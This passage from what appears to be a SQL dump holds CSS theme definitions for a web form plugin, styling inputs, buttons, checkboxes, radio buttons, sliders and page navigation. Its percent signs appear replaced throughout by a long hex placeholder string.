1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #88B4BD;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #678B94;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(15,'Theme 04 red','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #E0B8AF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CAA298 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #BD9E96 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B6958E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E0D0CD;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\nmargin: 16px 10px 16px 0px;\r\ndisplay: inline-block;\r\nbackground: url([SITE_ROOT]/images/04/03/bg.png) no-repeat;\r\ntext-align: left;\r\nborder-radius: 0px;\r\nwidth: 300px;\r\npadding: 5px 10px;\r\ntext-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #B98476 ;\r\nbackground: -moz-linear-gradient(bottom, #CA9B8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DBACA0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B98476 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A38279 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #CA9B8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DBACA0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B98476 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A38279 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #CA9B8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DBACA0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B98476 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A38279 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #CA9B8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DBACA0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B98476 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A38279 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #CA9B8F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DBACA0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #B98476 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A38279 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #9B766D;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #CCAAA3;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #8A6B63;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 